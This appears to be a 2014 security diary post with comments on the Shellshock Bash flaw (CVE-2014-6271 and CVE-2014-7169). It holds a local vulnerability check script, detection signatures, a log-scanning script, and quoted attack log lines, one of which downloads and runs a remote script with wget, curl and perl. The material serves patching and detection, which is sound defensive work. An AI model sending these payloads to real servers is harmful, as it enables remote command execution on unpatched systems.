Attention *NIX admins, time to patch!

Published: 2014-09-24. Last Updated: 2014-09-24 16:05:51 UTC
by Pedro Bueno (Version: 1)
7 comment(s)

Over the past few years we have become used to Microsoft patches, the important and critical ones that leave your system wide open if you do not apply them. We have probably become so used to them that we sometimes forget that our Linux servers need patches too.

Today I learned about a critical Bash patch that addresses CVE-2014-6271. According to the advisory:

"A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue."

Patches are already available for most Linux distributions, including Red Hat and Debian, so waste no time. The root cause is Bash's habit of importing function definitions from the environment: a variable whose value begins with "() {" is parsed as a function, and a vulnerable Bash keeps going past the closing brace and executes whatever follows. Any service that places attacker-supplied data in the environment before spawning a shell, CGI scripts being the obvious case, therefore hands the attacker command execution.
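Before and after patching, check the binary itself rather than trusting the package version. The script below is an added example, not part of the diary: it runs the widely published proof-of-concept environment variables against a bash binary, for the original bug and for the follow-up parser bug (CVE-2014-7169) that the first patch left behind. The only assumption is that a bash binary is reachable; the function names are mine.

```shell
#!/bin/sh
# Added example, not from the diary: probe a bash binary for CVE-2014-6271
# and for the follow-up parser bug CVE-2014-7169 using the widely published
# proof-of-concept environment variables. The function names are assumed.

# shellshock_check [bash]: prints "vulnerable", "patched" or "no-bash".
# The variable x holds a function definition "() { :;}" followed by a
# trailing command. An unpatched bash executes that trailing command while
# importing the environment, i.e. before the -c script even starts.
shellshock_check() {
    bash_path=$(command -v "${1:-bash}" 2>/dev/null) || { echo "no-bash"; return 0; }
    # env -i gives the child an empty environment so only the probe variable
    # is present; stderr is dropped because a patched bash warns about the
    # ignored function definition.
    out=$(env -i x='() { :;}; echo CVE_2014_6271_MARKER' "$bash_path" -c 'echo probe' 2>/dev/null || true)
    case "$out" in
        *CVE_2014_6271_MARKER*) echo "vulnerable" ;;
        *)                      echo "patched" ;;
    esac
}

# shellshock_check_7169 [bash]: the first fix left a parser bug. The classic
# probe leaves a dangling redirection ">\" after the broken definition, so
# the next command "echo date" is run as "date" with its output redirected
# into a file named "echo". Run it in a scratch directory and check whether
# that file appeared.
shellshock_check_7169() {
    bash_path=$(command -v "${1:-bash}" 2>/dev/null) || { echo "no-bash"; return 0; }
    tmp=$(mktemp -d)
    ( cd "$tmp" && env -i X='() { (a)=>\' "$bash_path" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$tmp/echo" ]; then result="vulnerable"; else result="patched"; fi
    rm -rf "$tmp"
    echo "$result"
}

echo "CVE-2014-6271: $(shellshock_check)"
echo "CVE-2014-7169: $(shellshock_check_7169)"
```

Pass a path as the first argument to test a specific binary (for example an older bash kept around in /usr/local), since the one in PATH is not necessarily the one your CGI scripts or cron jobs run.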

---

Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure

Keywords: cve20146271

Comments

The good news is that it's an easy fix:

Debian (Ubuntu, etc.): apt-get update && apt-get install --only-upgrade bash
RHEL (Fedora, CentOS, etc.): yum update bash
We've created the first batch of Sagan (log analysis engine - http://sagan.io) signatures to detect this. These monitor bash history and Apache logs for attempts. More information can be found at:

https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4

Apache:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)

Bash:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)
Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
https://access.redhat.com/articles/1200223
Red Hat provided an update indicating the patches are not complete and a new CVE has been assigned (CVE-2014-7169); more here:

https://access.redhat.com/articles/1200223
We've just started seeing scanning traffic using the following packet contents:

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*

This also appears to be using spoofed source IPs. No logs at this time.
You can't spoof a TCP payload. I've seen the above attacks from 89.207.135.125, which is (to me) obviously a host for malware sites and this sort of activity.

It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by).
Examples from my webserver log:

89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

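The Sagan signatures posted above and the access-log lines just quoted both come down to the same detection: a quoted header field that starts a bash function definition. The script below is an added example, not from the diary, from the Sagan project or from either commenter. It runs that check over a constructed sample log (placeholder addresses from RFC 5737 ranges, modelled on the lines in the comments; the function names are mine) and, in one place where it goes beyond the posted rules, matches on "() {" rather than the full "() { :;}" string, since bash only ever imported values beginning with exactly those four bytes.

```shell
#!/bin/sh
# Added example, not from the diary or the Sagan project: pick Shellshock
# probes out of Apache combined-format access log lines. Any service that
# copies request headers into CGI environment variables (HTTP_USER_AGENT,
# HTTP_REFERER, ...) is exposed, so those two quoted fields are what we check.

# Constructed sample log (placeholder addresses from RFC 5737 ranges), modelled
# on the lines posted in the comments. Line 2 is a benign request, line 4
# carries the payload in the Referer instead of the User-Agent.
SAMPLE_LOG='203.0.113.10 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 192.0.2.5"
203.0.113.11 - - [25/Sep/2014:00:49:02 -0700] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/5.0"
203.0.113.12 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :; }; /bin/bash -c id"
203.0.113.13 - - [25/Sep/2014:09:01:00 -0700] "GET /cgi-bin/test.cgi HTTP/1.0" 200 50 "() { :;}; /usr/bin/wget http://192.0.2.9/x" "curl/7.30"'

# shellshock_report: reads log lines on stdin, prints one tab-separated line
# per hit: client-ip, request, which header carried it, the payload.
# Splitting on the double quote works for the combined format because
# fields 2, 4 and 6 are the quoted request, referer and user-agent. Apache
# escapes an embedded quote as \", which this simple splitter would cut the
# payload at; a production parser must handle that.
# Match on "() {" rather than the full "() { :;}" used by the Sagan rules:
# bash only imported values beginning with exactly those four bytes, and
# "() {" also catches "() { :; }" and other bodies the narrower string misses.
shellshock_report() {
    awk -F'"' '
        {
            payload = ""; where = ""
            if (index($4, "() {") > 0) { payload = $4; where = "referer" }
            if (index($6, "() {") > 0) { payload = $6; where = "user-agent" }
            if (payload != "") {
                split($1, a, " ")
                print a[1] "\t" $2 "\t" where "\t" payload
            }
        }'
}

# shellshock_count: number of hits in the log text passed as $1.
shellshock_count() {
    printf '%s\n' "$1" | shellshock_report | awk 'END { print NR }'
}

printf '%s\n' "$SAMPLE_LOG" | shellshock_report
echo "hits: $(shellshock_count "$SAMPLE_LOG")"
```

Feed a real log with `shellshock_report < /var/log/apache2/access.log`; the first column is what to block or report, and the fourth tells you what the attacker tried to run, which is worth reading because the wget/curl style payloads name the host the second-stage script was fetched from.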

Shouldn't this rate setting the Threat Level to at least chartreuse?
